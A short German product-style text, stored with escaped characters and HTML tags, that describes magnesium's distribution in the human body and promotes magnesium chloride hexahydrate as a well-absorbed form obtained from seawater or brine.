Magnesium ist mengenm\u00e4\u00dfig der vierth\u00e4ufigste Mineralstoff im K\u00f6rper, nach Calcium, Kalium und Natrium. Der K\u00f6rper enth\u00e4lt etwa 21 bis 28 Gramm Magnesium; 60% davon sind in das Knochengewebe und die Z\u00e4hne eingebaut, 20% befinden sich in den Muskeln, 20% in anderen Weichteilgeweben und der Leber und weniger als 1% zirkuliert im Blut. Das Magnesium insgesamt befindet sich zu 99% in Zellen (intrazellular) oder im Knochengewebe und zu 1% im Extrazellularraum. Eine unzureichende Einnahme von Magnesium mit der Nahrung kann zu Gesundheitsbeschwerden f\u00fchren.<\/p>\n<p><strong>MagnesiumChlorid<\/strong> Hexahydrat&nbsp;ist wahrscheinlich von allen Magnesiumverbindungen diejenige, die vom menschlichen K\u00f6rper am schnellsten erkannt und am effektivsten assimiliert wird. MagnesiumChlorid Hexahydrat wird durch Verdampfen von Meerwasser oder aus Solequellen gewonnen. Anschlie\u00dfend wird das Natriumchlorid (Kochsalz) entfernt und MagnesiumChlorid bleibt \u00fcbrig.
